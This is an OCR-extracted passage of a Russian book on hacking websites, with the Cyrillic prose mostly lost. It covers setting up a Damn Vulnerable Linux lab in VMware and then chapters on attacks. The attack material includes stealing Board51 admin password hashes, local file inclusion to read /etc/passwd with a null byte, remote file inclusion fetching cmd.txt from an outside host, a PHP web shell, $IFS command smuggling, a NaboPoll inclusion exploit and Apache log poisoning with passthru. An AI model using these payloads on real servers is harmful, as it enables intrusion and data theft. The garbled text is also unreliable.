Вы находитесь на странице: 1из 168

00. .............................................................................................................................

9
I. ..............................................................................................
0 1 .0 ....................................................................................................... 12
02. .......................................................................................................................16
II. -............................................................................................. 25
03. ..................................................................................................................26
04. -..................................................................................................................... 31
05. SQL- ................................................................................................................ 47
06. ............................................................................................... 59
07. SQL-.................................................................................................... 70
08. -................................................................................ 83
09. CRLF- .................................................................................................................. 86
III. ?..........................................................................................................87
0. .................................................................. 88
0. ............................................................................................ 94
. ..........................................................................................

102

0D. .............................................................................................. 109


0. .................................................................................... 118
0F. ................................................................................................ 122
10. ..........................................................

124

11. .................................................................................................. 126


12. ............................................................................................

128

13. IT-............................................................................... 131


1. *-........................................................................ 138
2. SQL- show.php Cyphor.............................

140

3. Cyphor.................................... 144
4. SQL-
C yphor.................................................................................... 150
5. SQL- MS SQL Jet ........................................... 152
6. nabopoll.php ........................ 155
7. SQL-
MS Access............................................................................................. 157
8.
instantCM S...........................................................................................

158

9. SQL-............................................... 161
10. ...............................................................................

166

00. ............................................................. .......................................

......... 9

............. %........................................... ............... ...... * ................... 9


. . . . . . ............ %........................................................................................... 9
..... .................................................................................. ....................10
I. , . , ........................ ....................... ..
01.

11

. * .................... ................................................ ................... . . 12

.................... ............... 12
-.............................. .
............................................................................ 14
02. ............* ...................... ....................................... ..............................

16

. -............................................................................. 25
03.

........................ . . . . ................... ..

26

04. - ................................ ........................ ............................ ............................ 31


-. . ........................................................................................... 31
-............... ......................................... . .................................... 35
- N aboPoll................................. p f !........... 40
- Apache .......... 41
........................... ....... ............................................... 44
............................................ ................................... . 44
......................................................................................45
05. SQL- ......................... ....................................................................................47
.................... . . . . ................ .........................53
-........................................................................................... ......... 54
SQL-.............................................................................................. 56
................................... .........................................58
06* ............................................. .............................................. 59
XSS .......................................... ..................................................59
........................................ .................................. 60
.................... ...................................................... 61
-, XSS ......................................................... 62
<script>........................................... 67

07. SQL-.............................................................................................70
MySQL @@version.................... 71
mysql.user ..............................................71
........................................................................................ 72
.................................................... 72
/ ............................................... 73
SQL- NaboPoll............. ................................................74
....................................................... 79
............................................. .............................................80
...... ................................................................ 81
08. -.................................. ....................................... 83
/proc/self/environ....................................... .................................83
Apache .................................................................................... 84
...................................................................................84
09. CRLF- ...........................................................................................................86
I I I . ?........................................................................................ 87
0. ............................................................88
0. ................................................................................... 94
. ................................................................................... 102
*-........................................................................ 102
LDAP- ..................................................................... 105
\5- ................................................................................................ 106
0D. ........................................... ............................................ 109
0. .......................................................................

118

0F. ......................................................................................... 122


10. ................................................... 124
11. ........................................................................................ .126
12. ............................................... ....................................128
13. - ...................................................................... 131
............................. 131
IC Q ..................................................................... 133
, ................................................ 135
1. *-.................................................................... 138
2. SQL- show.php Cyphor............................140
3. Cyphor................................ 144


,
. ( ,
, ),
- -,
.
, .
,
.
, , ,
,
.
Linux (
Windows), ,
Linux, .
,
( , , ,
, ). ,
, , ,
,
.
( ,
).


,
1995 1999
( , ,

10

**

* > \ * tie ,
^. , ,
. 1\
0* . v .
-00
( '00 nv\\ ).
.


; ' DVD-
I ,inix, D a m n V u ln e ra b le L in u x B a c k T ra c k 4.
vmww ewoN ,
, 02.

' .
, ,
11 .
,
rompnOpH.ei.eom ( , ).
!
-
http:; / www.pltei.rom,

01.
02.

. *nix
Unix- ( , AIX, HPUX, SunOS, Solaris, Linux, FreeBSD, OpenBSD, NetBSD - ).
Windows
Microsoft ,
Windows. , , ,
.

-
:
-? -
. , , ,
- .
- -,
. ,
, ,
, , ,
.
- , , ,
,
( ).
- ,
. , ,
-,
.
-:
( );
;

\3<v*V. ) ''

13

;
( covey auwku,
).
.

>

\;.^

. -
Hacked by . :^\*

. .). , , .
-
.
, ^ vs<v vc\
\
>.
( .)
. )}*'
. ,
<\ -
,
^ ^

.
& .<
^
. , se fc ^'rm
.
,

(
W indow s) ( *nix). xasxfi w&aset
, ,
.^ ;
, .
-
.
. - .'*' trrasv* tov.
( & |> i)
ca^'t

. . & ^.
, - \
, * .

, . *; .

- , .ty^ac: vov.yvv.*
, - wc'
. , W*V >iII
opranvLM
, to ? Vi
.

V .-

14

01.


, , IP . - (proxy),
,
( ). ,
. ,
, .
,
. (),
, -
. ,
-, .
-
, , ,
.
,
, . ,
- ftp-.
free proxy list
.
, IP - (, www.2ip.
ru), , , .
, ,
!
.
, SocksChain
Ufasoft,
.
.
(Virtual Private Network, VPN). ,
(
VPN ). VPN
.

. ,
,
,
. ,
. ru.
, www. hi demyass. com.
.
,

15

( ), .
* .
.
, ,
,
. (.gov)
( .mil) , (.edu).
( , )
( ). ,
.
,
.
. ,
(live-CD) .
.
( )
. , , ,
,
.
,
.
.

,
, ,
.

lit i1 111I|.1, o i 11 III' ,


hoiwwimiom (). r.iien,
I JiiIh, I >iiinn V ulnerable Linux Back Track 4.
COItltT

................--------------------------------------------

( )1 DVD.

. Damn Vulnerable Linux (


.#, DVL) Back Track 2.
DVL 1.5.
: www.damnvulnerablelinux.org.

(: ). DVL
(live ( I )),
, !
) ,
,
.
, , , .
. ? (
Windows), ,
(.1 .
,
.
VMwarr Virtuiilllox.
VMware , .
I ! ( ) www.vmware.coni/
product!/1/, www.VMware.com/Down1oad. I ^ VMware.

)/

...........................................

Koi I'VI VMwat*, |



(MftW / (< /
kernel ( , \). |
- .
\<' HpOl VMVrtlt\ MfH fM

512 .
- Hack Truck V l\l"0 ' >;<
www.backtrack I Inux.org vlownhvbh ,

. 4 VMwaic, |
' 11 Ubuniu,
, I ,
1, |
. ,
VM war MaytH"

File * Virtual Macbtw -

Welcome to VM w a i u Player

(VtvMo ft N r w Vli liiiil Mfl< 11


x tw v

1# % whfo h will f t lf f I*

tv> H\p teg f Mi' i

O pen

<\ V t r l i N il M r u h h

# \ ) v H llf t l

\P\ W hli.h Will 111 lt*

mfed te Uvp\\v ' yt

I l|Hj%"*vfo <0 VMWflFt* WO?kMrHlOM

\
dyr*tdOaUH**%uh** **|*lI
**
1;%V;teVlpil 1

I JHp
VVnVVW
W
JMf*HflVH41Hi\
!f?|*\

. 02.1. VMw.iit* inn no mnyt

18

0 2 .

', VM ware Player ,


( ,
), ,
VMware Player .1, ,
,
' .
1. VM ware Player. , -, 02. 1
Create a New Virtual Machine (),
L\ , . 02.2,
Installer disk image file (iso) |> V u ln e ra b le
Linux, Browse. C:\Diiiiin VujMPflble
Linux 1,5, DVL_l.5__lnfect.ious J jiie a s i. 1so.
Next.

Welcome to the New Virtual Machine Wizard


A virtual machine is like a physical computer; it needs an operating
system. How will you install the guest operating system?

Install from:
1 1 Installer disc:

Installer disc image file (iso):


j C :\D am nV ulnerableLinux l,5 \D V L _ 1 .5 J n fe c ti0 U S j)li v

ihjflhfiiMihTIi

SO,,,<i

t'ii

i \ Could not detect which operating system is in this disc image*


) I will install th e operating system later,
The virtual machine will be created w ith a blank, hard disk,

Help

Hext >
1*||

Cancel

. 02.2. , 1

3. , . 02.3,
Next.
4. (. 02.4)
. ,
D V L D am nV ulnerahlcLinux,
. Next.

SH edt a

i.r,c .

19

Gmsst O p e r a tin g S y s t e m
- x e ^ r c s^srjsr: ..4 b e in state d on th is virtu a l m achine?

W rc C 5

~&

< Back

Wext >

j j

Cancel

P c 02-3. , 2

rft4.ju

"Hffi

%wmtth e V irtu a l M achine


*^ac ~arne i^ cd c o _

s-

:: us fo r dies virtu a l m achine?

~-

_;

ts =rcfecrcs"ljssari.'*/ Cocjnents\MyVirtual Mac j j Browse... i

faext >

i 1

C ancel

Pnc. 02.4. ?-fecai , 3


* ?5 . 02.5.
, , . 8 . D V L

0 2 .
2 , 8
(
). *
, 2 , Split virtual
disk into 2 GB files, .
, , 2 ,

. Next
Now Virtual Machine Wizard
Specify Disk Capacity
How large do you want tfres desk to be?

The vfrtuai machines hard desk is stored as one or more ftes on the host
computer's physical <fcfc. These fie fs ) start smal and become larger as you
add applcations, Wes, and data to your virtual macNne.
Maximum dtek (GB):

8.0

Recommended see for Other Linux 2.6.x kernel: 8 GB


C Store virtual disk as a single fie
'

virtual
Spitting the dtefc makes it easier to move the virtual mechne to another
computer.

Help

< B **

| i

frxt >

I L.i-SDSSi. .1

. 0 2 .5 . , 4


, Finish ( 02.6).

512 , 250
Damn Vulnerable Linux .
Customize Hardware.
. 02.7. ,
(796 ).
2 ( ), ; ><
. , ,
- Auto
detect (). , , , '( ,
, . 02.0.111
Finish, .

21

R e a d y to I r e a lr V irtu a l M ach in e
Click Finish to c re a te th e v irtu a l m achine an d s ta rt Installing O th e r Linux
2 .6 .x kernel.
The v irtu a l m achine will be c re a te d w ith th e fo llo w in g tfettlngei

Nam e;
Location j
Version:
O p e ra tin g S ystem :

O th e r Linux 2,6.x kernel


; \D ocum ents and 3 e ttln g s \u s e r\M y D ocum ents\M y V lrt,,,
W o rk sta tio n 6 .5 -7 .0
O th e r Linux 8 ,6 .x kernel

H a rd Disk:
M em ory:
N e tw o rk A d a p te r:
O th e r D evices:

8 GB, Split
25 6 MB
NAT
CD/DVD, F lo p p y, USB C o n tro lle r, S ound C ard

flu s to m lzc H a rd w a re ,,,

0 E o w e r on th is v irtu a l m achine a fte r cre a tio n

mm

...........................

*'1*** ""*
,

< Back

Finish

..... . .........

Cancel

. 02.6. , 5

mm

D evice

/ M em ory

Sum m ary

; S pecify th e am ount o f m em ory allocated to th is v irtu a l


j machine. The m em ory size m ust be a m ultiple o f 4 MB.

P rocessors
0 N e w CD/DVD ( . . .

Using file C :\D am n Vulnerable,,

Floppy

U sing d riv e A:

N e tw o rk A d a p te r

NAT

@ U S B C o n tro lle r
Sound C ard
D is p la y

M em ory fo r th is v irtu a l m achine:

MB

P resent

896

A u to d e te c t
A u to d e te c t

A Guest OS recom m ended minimum:

32 MB

A Recom m ended m em ory:

25 6 MB

Maximum recom m ended m em ory:

796 MB

(M em ory sw apping m ay occur b e yon d this size.)


Maximum co n figurable m em ory:

32 76 8 MB

a d d ,,, j )

OK

Cancel

. 0 2 .7 . ,

Help

22

02.

.'..
. 02.8. Removable Devices (
), .
I Finished Installing ( *),
Linux
. ,
Ctrl, . , 6 (
Ctrl+G
).
, Ctrl+Alt (Ctrl Alt ).
Other Limnc 2,6.x kttttwi - VMvf*w

fl

texhash:
texhash;
texhash:
texhash:

Uj>dt ing
Updating
Updat i ng / w / In ^ te v to tttv b '- S v . .
Done,

Ueleone to Bann U h\ m blc


Heuer rtin th is d is tr ib u tio n

SUtjM wine
w w ir o w w t!

feSSR *** M<4t

:1loess**

. .
Login as V oot'1, w ith psssuw ^ W

lo U n iU m t v o te s , lowercase.

A fter you to<ji. tw j the Col Ioii


^stapbt . . . to run b l o ^ t
i* WSft M io lW !tjt% 8 otT SK s )
lu x
n m XoiodoM sypten l* UCSft write & * t V9 te tFluxBox)
x cm if . 4 . . t o autocoorisure gowr r a b ie s M
f t V etter gerfar**nce
e t l ; . ; to antocont igure M t
t i l o * i j t L l required)
& cowwwls oi fin d seta I $$#> e s jr r ts o | M | :
nw ---

SMGh^Ui

. . . t o an* r t j t i f l
file s u a p . . . to create sp e c ia l f i l e fo r |

harddi;

llhen fin ish e d * use '* o r

tin u H

s*?r ss3 * a 5 c3 a a a s5 w 5 9 sta a * # * .ts* ri^ - - a - r

dts^eo Is 1 ^ o

2 .0 1 * 1^

a iE x c i

in h

!
J- *''''

C lck in th e v irtu a l screen


to send keystrokes

Insfcal the suest syrte* * 'cv w c U J .vs


system boots up, cfc*!
re ta fe v

vcm

are i t * and the operating

j 1 Finished Instalng j [ Change ? j |

1->

Todirectinputtothevirtuali
. 02.8.

root, Enter.
(password) toor ( root )
Enter. ,
:
bt - #

23

bt , # , .
# $.
Linux.
Linux , ,
Enter.
KDE startx
Enter. :
bt ~ # startx

, .
Linux, , Windows
( , Windows),
.
- ,
,
( Linux),
, .
.O th u r

kerrm l V M w a m P la y e r

D am n 1 LinOM
I n f e c t i o u s JD is e a s e

9tQ0

liM
OfUK
if,;./

Analyze

protection. H i

W f t w ' .............
la tbit virtu*! machine, pro* OrltG,

. 02.9. KDE

24

02.

,
. 02.9.
KDE.
Firefox ( )
. , W indows-.

( ),
(de). ,
,
.
,
.
(Ctrl+Alt),
VM Power Suspend.
.
VMware Player.
Back Track 4,
, , ,
Linux Ubuntu, Linux,
I Finished Installing (
-).

II
-

03.
04.
05.
06.
07.
08.
09.


-
SQL-

SQL-
-
CRLF-

- - -,
. - .
.
. (bug) .
- -,
.
,
(, ).
,
, Linux- -. ,
DVL , http- (-
Apache). HTTPD (
). Konqueror (
Windows). Start HTTPD
. , - . ,
Konqueror , -.
( http ://) Location
Enter.
Board51,
- (http://localhost). (Firefox Konqueror)

http://1ocalhost/webexploitation_package_02/board51/board.php
, , (. 03.1).
, ,
, ,
nix-. Windows
(, D) D:\\Inetpub\wwwroot\board51\.
, -
A pache ( - *-,

27

-1** V'v

*>

. %

|>

tl^P1

v
' ^ ' ''4n ^S v-4 v*

/h

v &V3$M K H L W 't* i vlH' a i d . h

W am tno: t44H\4t\NMvi\itA ttataAfWpvtti) (function,fopen): failed to open stream: Permission


dented in *ur lo c a l apawh* h td o cs webexploitation_package_02/board51/board.php on

line 3 3
Warning* *\&*0
It not a valid stream resource in
/usr/local a p a ch a \1* ab<?\plolttionwpackage_02/board51/board.php on line 39

W arning: fck>s*KY suppiHKi > | is not a valid stream resource in


u s rlo c a l apach*. ht\1ocj 4vbtt4ploitationj>ackage_p2/board5l/board.php on line 41
-

i..

. ' ------------------------

*
U

'S
1i
v

d e b a s e d jp h p -b o c u d

i
H w w w tt,

V..'.; V TnV.-V '

N u t s w ig
ft*

b e im

^ # ^

Onturn

letrtcr Eintrag

OJ Oct 2002
0S.1013

03 1002-05:10:13
von Admin

ntiwMp* EintrAtf* Status

Niitzur> 9$ h in w e is | D o w n lo a d B o a rd s !

>
far>

0 3 .1 . ( BoardSl

Windows). , - ,
- (-) . ,
, (Internet Explorer, O p
era, Firefox r. it.)* , ,
-. - -
(, ), -,
, . .
, .Boards1
, .
, , ,
. boarddata/data/ussr.idx
, , IC Q h .
, ,
. ( . , ,

ivro 11 ,
.)

http ; /71 1host webexploitat1onjpackageJ)2/board5l/boarddata/data/user. idx

28

03.

AdeiDiUforoeft'Mlim. ste:;

02:06:17:21 ft*y 1 2 1 9 9 :

03,2- |051 '-S&T.OC | D '627^-! BodrdSl

6 yser.fs* ipse. >33.2).


, - . ([),
( ) bscxszzt -'^;
2123229757574385441^
^ * , (Message Digest 5).
,
( zzx l Kpo*se ,
-. moss - .

,
|
1
^
de^ro
com

&
*
</ feta'

1 V 4 1% i^ ^nsi
wW V4V
^ W V#\^1
i ndex -php*ang=rus (. -j-j/. ? InsidePro. *. .
, CAFPC.-A@
jzm '
-g33-~~a -32 ,
(). <'-=; -;
21232f297a57a5a743gS4s:e^l^2 : '

:<^5 - .
fwsbcxplitetion
*l. ^..
!- ^^
^
package_02/bGcrcc.L/ tiGcrc.
I ( .
(admin) ^
.
(Warning), EaHBdL :: ,
cpajses^ ? ? .
(. 031*4)- 11&- ^. _ ^
! . :. 2 >

iQCitton g(tt yiw gty 11*

';
., i*

29

1 |* : 1

ft > \ **

I ii. illuh j i'

1*\> CWW'HHte*

M ia
A*UM(10)
ftitWftatWfcltWMtftrtfttOlfcl

3+Tnw-^
f n-H-ft-ftf-t * r
T T r - h * 4 + * i w 4 i T i <p j r $ jf* -

CAPTCHAI

*.
4),034*203
*** ?fc*8HjA-v

. 1 9 . 9 6 7 , 9 7 0 ! 1 0 3,427.637
4 M b r n p j ' i i j w r c b .
HifiHH * . 2,165.455.

. 03.3. -

3 ! 3 5 ^ % te fo rg e
lo c a tio n
- &

1 1

cJU

!% ,

y iw

5,<^^

: ;/? .

/ \

,*>;

' '

ijcip
i r j

W indow

> l& catlm v |(|* http//!ocalho*t/web*^ploltMlor>wpcK^Qe^O^/boarxi51/boenl,|>hp

N*ues Forum
Konfiguratioft
$$

. 0||# <*
,
Abmeld#n
Them
H in w ie , E rs te N u tz u n g
N e r z lic h w illk o m m e n , f a 1
S c h re ib e n w u n s c h t U f o r g

Vtel S p ^ S b e im

J ____ ____ ____________

.I

------ -------------.
Anqemeldet als AdminAdmin
Besucheronline ; 1
j

Datum

letzter Eintrag

03 Oct 2002
05:10:13

03 1002-05:10:13
von Admin

Th re a d s Eintrage Status

00

Boandnmtw Nutsungshinweis j DownloadBoardSl __i


'Page loci(4e?c{.

. 03.4. Board51

, IP - .
. , , .

30

03.

IP - ,
. ,
TCP/IP, IP-, .
IP 4 IP- (
0 254), , :
192.168.2.11. () IP -, ,
1- 127.0.0.1.
, .
1 65 535.
, .
- , , .
, - 80, FTP 21.
, ,
, , . ,
, , 1-
, . ,
-, IP 80,
, -. -, ,
IP- ( , )
-.
.

, -,
includeO , -
. ,
. (V/r . vndxide
[-]). (Local File Include,
L F I) (Remote File Include, RFI).
.
, ,
HTTP FTP .
, ,
. .

-

. :
http://[target]/index.php?page=./../etc/passwdXOO

[target] ,
www.site.com. /etc/pass*':.
:

. / ;

.. / , Unix- .


HTTP (null-byte).
. ,
,
. php .tx t.
: /etc/passwd. php, .
, .

32

04. -


index.php . , Dam nV u ln e ra b le lin u x
- /usr/locaT/apache/htclocs/. ,
(
.. /) 4 , .
, lit docs,
. ,
-,
, ,
.
/usr/local/apache/htdocs/
-. ,
, -,
.
( Windows)
Damn Vulnerable Linux Tools Editors Kate,
Kate ( , ,
). Default Session (
, , , D V L ).
( ^!)):
<?

$page - ($_GETC'']):
includeC.7htdocs/$page.php");
?>

(-)?
. , , .
$,
, .
htdocs (
$)
.php. . ,
( ) . ,
, ,
. ( File Save)
/usr/local /apache/htdocs. ,
, Enter
. .
my.php , Save. 11
, .php.
. .
(F ir e f o x K o n q u e r o r )
:
http://1 !host/my.php?page=. / . . /etc/passwd^OO

33

localhost
( : www.Hte.com).
, . 04.1,

lo e li

4 ! .4

* aiidtv g$t t>ttpYfloci>H>o*Wr\\y |>h|^pAgi*/,,/fltC/pftMWlUOO


.

.......H M M M M I>*"('** *

I.

Warning: maln(^tdocs/7*/^tc/pAisa;wcl) [(01))! fiMid to open ftream; No such file or


in /usr/local/apaclia/htdocs/my php on lln 3

directory

Warning: main() [tuj)dJot\,Jnc


): FaItad opening \/htdoci/,/,,/itc/paeswd' for Inclusion
(includejDath\:Aisr/local/Hb/php) In /u*r/local/apach*/htdocs/my.php on line 3

loaded.
. 04.1. /etc/passwd

!
.. / ,
http://local host/nay.php?page-/etc/passwdfcOO
http://loca1host/n\y.php?page-./.. / . . / . ,/etc/passwd*00
,
/etc/passwd, . 04.2.
! !
/etc/passwd , :
. .
View View Document Source ( Konqueror)
View Page Source ( Firefox)
(. 04.3).

0 4 . -

http //localbost/m y p h p -K o n q u e r o r
atien

dit

y i w

'sookm arkft

lo o l

Settings

W ind o w

tietp

jjjy http.//1oclhost/my.php?pge*./../../../../../etc/passwd%00

root:x:0:0::/root:/bin/bash b in :x :l:l:b in :/b in : daem on:x:2:2:daem on:/sbin; adm :x:3:4:adm ;/var/)og:


lp:x:4:7:lp:/var/spool/lpd: sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt m ail:x:8.12:m ail:/.
new s.x:9:13:new s:/usr/lib/new s: uucp:x:10:14:uucp:/var/spool/uucppublic:
o p era to r:x:ll:0 :o p e rato r:/ro o t:/b iiV b a sh gam es:x:12:100:gam es^usr/gam es: ftp:x:14:50::yhom e/ftp:
sm m sp:x:25:25:sm m sp:/var/spool/clientm queue: m ysql:x:27:27:M ySQ L:/var/lib/m ysql:/bin/bash
rpc:x:32:32:R PC portm ap user:/:/bin/false sshd:x:33:33:sshd:/:
gdm :x:42:42:G D M :/var/state/g dm :/bin/b ash pop:x:90:90:POP:/: nobody:x:99:99:nobody:/:
postgres:x:1000:100::/hom e/postgres:

Page loaded

. 0 4 .2 . /etc/passwd
r o o t : : Q:Q: : / r o o t : / b i n / b a s h
b i n : ; 1 : 1 b i n / b i n ;
d a em o n :x; 2 : 2 : daemon: / s b i n :
d m : x : 3 : 4 1adm : / v a r / l o g :
lp :x :4 :7 :lp :/v a r/s p o o l/lp d :
s y n c ix j5 i D : s y n c : / s b i n : / b i n / s y n c
s h u t d o w n : x : 6 ; O: s h u t d o w n : / s b i n : / s b i n / s h u t d o w n
h a l t ; x i 7 : :h a l t :/s b i n :/ s b i n / h a l t
m a il:x :8 ;1 2 :m a il:/:
news j x ! 9 : 1 3 : n e w s ; / u s r / l i b / n e w s :

uucp;x :1Gj 14:uucp;/ va /s pool/ uucppublic;


o p e ra to r:x : I 1 : 0 : o p e ra to r:/ r o o t :/b in /b a s h
games : x : 1 2 ; 1 0 G : g a i H e s : / u s r / g a m e s :
f t p j x : 1 4 i 5 0 : :/h o m e /ftp :
s m m s p : x : 25 : 2 5 : sm m sp: / v a r / s p o o l / c l i e n t e q u e u e :
mys q l : x : 2 7 : 2 7 : M y S Q L : / v a r / l i b / * y s q l : / b i n / b a s h
r p c : x : 3 2 :3 2 : R P C portm ap u s e r : / s / b i n / f a l s e
s shd : x i 3 3 :3 3 : ss hd :/ :
g d m : x : 4 2 : 4 2 : GDM: / v a r / s t a t e / g d m : / b i n / b a s h
p o p :x ; 9 0 : 9 0 : POP; / :
nobody:x :9 9 :9 9 :nobody:/ :
p o s tg re s :x :1 0 0 0 :1 0 0 ::/h o a e /p o s tg re s :

. 04.3. /etc/passwd

/etc/passwd? ,
() .
. (
root). root (
) 0 0.
. ,
/etc/shadow ( FreeBSD
: /etc/master.passwd). /etc/shadow,
, , ,
.
? , .
,

35

, /etc/shadow.
, .
/etc/shadow
root , root.
,
. , ,
,
( ). ,
Linux - /etc/shadow
.

http://l ocalhost/rr\y.php?page=./.,/etc/shadow^OO
, ,
root, - A p ach e, ,
,
Permission denied ( , ).
/etc/shadow ,
.
00 (
)
http://localhost/.php?page=./.. / . . / . . / . . / . . /etc/passwd00
, . /etc/shadow, ,
? ?
-------------------------------------------------------------

. .

-
,
, ,
.

, *nix, .

http://[target]/i nj.php? i nc=http://narod.ru/cmd.txt&cmd=ls

cmd.txt
http://narod.ru. Is,
.

36

04. -

(File New)
:

<?
Spage | ($_GET[**]):
include("$page"):

?>
-.
my. php
i n j. php (File Save As) , my. php.
, i ncl ude htdocs
. php, ,
. ,
.
, (,
FTP). .

<>
<?php
print("<b>$cmd</b>\n");
systemdcmd);

?>
</pre>
cmd. php , i nj . php.
HTM L <> </> ,
(
). pri nt $cmd
,
. system() ,
$cmd, .
, ,
:
http://1 !host/i n j.php?page=http://1ocalhost/cmd.php?cmd=ls
, - . 04.4.
1s,
.
, -
, .
i nj .php cmd.php,
Parse error: , , ,
.
.

>Mottmowo) php -Konqueror


*tu*n

fc\M

Je o li

37

EXXB

Jftttndow ti*Jp

% ,
** ;y * \ \ **.
l> \
vjv
\0bhttftMiutttwffcrifti.phf)/^oca>ho%t/cmd.php?crncl-l5
It

#|
b#tf
CNld * php

cmd*phpindex*php
infophp
*
in j ,php
inj .phpRNtOUil
my .php
o lit t
phpmyadmin
unicornsctn
wtbtxploi t t i n_pa kage_01
W4>bxploitai\ion_package_Q2
I*op foftdtd

. 04.4. Is

, Is *-.
11, uname ( Unix-,
).
pwd (print working directory
) id ( ).
ion, nobody (
u1d-99), nogroup (
g1d-99). 1Iomhmo , ,
groups. , Linux-
- nobody.
dir, , Is,
, .
, ,
.
, .
, ( . shell ) "nix-,

(). *nix ,
Windows, CMD.exe. *nix-
bash sh.
, "nix- . Unix
(-), (--)

38

04. -

. , uname -
Unix-. ,
. , Is -1
,
( *nix
).
----------------------------------------------------------------------_

Linux Unix ,

- .

,
Is -al Is -la. -
. ,
.
? Linux $IFS,
().
1s$IFS-l . , ,
! . 04.5.
-:
<><? system( $_GET[' cmd' ]); ? x /p re >
, + ,
Is -la 1S+-1. .
. 04.5 .
(total). drwxr-xr-x? d
, (-).
, ,
, ,
:
(read);
w (write);
(execute).
:
-rw--w-- 1 bob csc532 70 Apr 23 20:10 file
drwx.....2 sam Al 2 May 01 12:01 directory

To
( , . 04.5
root, , , bob sam).
, .

Location

dtt

yiew

J&ookmarks

I o o lt

c*tmgs

&r>dow

Location: jfjlt httpj/localhostinj .php?page*http 7/locaHroitfcm d.php?cm dlsflFS

ls$IF S - la
t o t a l 37
d rw x r-x r-x
d rw x r-x r-x
d rw x r-x r-x
d rw x r-x r-x
- rw- r - - r - I rw - - - - - rw -r-- r - - r w -- - - - rw- - - - - rw - - - - - rw - - - - - rw - - - - - r w -r -- -d rw x r-x r-x
- rw -r-- r- d rw x r-x r-x
d rw x r-x r-x
d rw x r-x r-x
d rw x r-x r-x
d rw x r-x r-x

10
16
13
10
1
1
1
1
1
1
1
1
1
8
1
9
12
5
7
19

ro o t
ro o t
ro o t
ro o t
ro o t
ro o t
ro o t
ro o t
ro o t
ro o t
ro o t
ro o t
ro o t
ro o t
ro o t
ro o t
ro o t
ro o t
ro o t
ro o t

39

ro o t 220 Jun 16
ro o t 107 Jan 18
ro o t 936 Jan 18
ro o t 107 Jan 18
ro o t
62 Jun 16
ro o t
37 Jun 16
ro o t
81 Jun 16
ro o t
79 Jun 16
ro o t
79 Jun 16
ro o t
66 Jun 15
ro o t
24 Jan 18
ro o t
49 Jun 16
ro o t
53 Jun 16
ro o t 2319 Jan 18
ro o t
66 Jun 15
ro o t 377 Jan 18
ro o t 1840 Jan 18
ro o t 172 Jan 18
ro o t 119 Jan 18
ro o t 366 Jan 18

1 7 :0 8
2609
2009
2009
1 7 :0 8
16 :53
1 6 :0 8
1 6 :0 8
1 6 :07
2 2 :4 2
2009
0 1 :2 1
0 1 :1 6
2009
2 1 :5 5
2009
2009
2009
2009
2009

i
__1 ....

base
beef
cmd.php
a n d .p h p cm d.pl
c ro d .p lc m d .tx t
in d e x .p h p
in fo .p h p
i n j .php
i n j .p h p manual
my.php
o la t e
phpmyadmin
u n icornscan
w e b e x p lo ita tio n _ p a c k a g e _ 0 1
w e b e x p lo ita tio n _ p a c k a g e _ 0 2

. 04.5. Is -la

() ,
. . 04.5 root (
).
, ,
. ,
. , , , abc
(d), root root:
drwxr-xr-- 10 root root 107 Jan 18 2009 abc
, (rwx),
, (-),
(--). , 18 2009
(Jan 18 2009).
Is -lad.
.
( root) chown
.
() chmod. ,
, ( 7) ,

40

04. -

( 5) (
):

chmod 765 - >


, ,

.
, , :
0

2 ;
3

5 ;
6

(, ).

( root)
, .
- . cat
, . ,
cat /etc/passwd /etc/passwd. ,
- : cat$IFS/etc/passwd
: cat+/etc/passwd.
*nix, *nix.
1.

-
NaboPoll
NaboPoll
( survey. 1nc.php, path) ,
( , , ) .
,
, :
http://local host/webexploi tati on_package_02/nabopol1/
survey, 1nc.php?path-http://1ocalhost/cmd.php?cmd=ls$00
. 04.6.

41

\\\\
\
> Apache
Q^aboBoll/sun/eyinc.pbp *
blp

\
$*\ $. V*** |vy*ki4*A Awfei
|| . .
fc>ctito* ^

&

^ \

.... .

S3

U
base
Cmd .php

cmd.pfopcmd p i
cmd.p i*
cmd. txt
images

index,^hp
info,php
in} xphp
in j >ph$*manual

my ,php
o la te

phpmy*4mi*
unicornscan
webex p IvM t a t \\>n p a \a a%
J> I
wefcexplcoLtatxo* ^ ^ ^ 9 ^ 6 2

. 0 4 ., <$.

:V\vw eM ? Is NaboPoll

-
Apache
(Vvvee , *
, () Apache. ,
Apache ^ httpcl-access.log httpd-error.log,
- (
| access, U\x ' , , error. 1).
D V I : accessjog 9,
/usr/local/apache/logs. ,
\^ kv, -,
, :
M-.pd.://UvAi*KKt

9*'/"/</logs/accessJog^OO

1la access_log.
no telnet 80 :
telnet. ,0,0 90
:

< ']):^< / /1.1

42

04. -

Enter 400 (. 04.7),


-, <pre><?passthru
( $_GET[' cnid' ]); ?></>, access_1og
:
:
[error] [client 127.0.0.1] Invalid URI in request GET <pre><?passthru
($ _ G E T ['c m d ']):? x /p re > HTTP/1.1

access-log:
127.0.0.1 - - [30/Jun/2010:13:00:40 +0200] "GET <pre><?passthru($_GET[cmd']);?>
</pre> HTTP/1.1

b t / # t e ln e t 1 2 7 * 0 .0 ,1 80
T ry in g 1 2 7 * 0 ,0 ,1 ,
Connected to 1 2 7 .0 ,0 .1 ,
Escape c h a r a c te r i s f p j ' ;
GET <pre><? p a s s th n i($ _ G E T [ c t d 1 ] ) ;? > < /p re > H T T P /1.1
H TT P /1,1 4 0 0 Bad Request
D a te : Sun, 27 Jun 2 0 1 0 1 9 :4 6 :5 8 GNT
S e rv e rt A p a c h e /1 ,3.37^ (U n ix ) P H P /4 ,4 .4
C on nection: c lo s e :
/
u A r 'V ':
C o n ten t-T yp e: t ^ t / h t i l f c h a r s e t ^ s d f 8 ^ r ; iv ! .^ v | l
<*D0CTVPE HTHL PUBLIC - / / / / 0 H W L 2 , / >
<HTMlxHEAD>
<TITLE>400 Bad R ^ e s O T l E >
^
^
v
</HEADxBODfy>
<Hl>Bad R e q u e s t ^ l > I
Your brow ser s e n t a re q u e s t t h a t t M s s e r v e r c o u Id n o t understand,,<P >
T he re q u e s t l i n e c o n ta in e d i n v a l i d . ! ^ fo llo w in g th e .p r b to e o l s t r i n g .

5/1

-S e iv e r a t f &t .

ied by fo r e ig n h o s t .

S S I
, , r\ ' 4

. 04.7. - Apache

- , ,
,
, , .
, , accessjog,
.
, GET, .
- Referer User-Agent,
( !):
I telnet 127.0.0.1 80
Trying 127.0.0.1...
Connected to local host.
Escape character is
GET 1 HTTP/1.1

- Apache

43

Accept; */*
Accept 'I diHiUfiiji:
Aecspt Encoding: clsf'lflib
User Ayent: lynx/2,8.Brel,1 llbwww-FM/2,14
Host; 127.0.0.1
Connection! Close
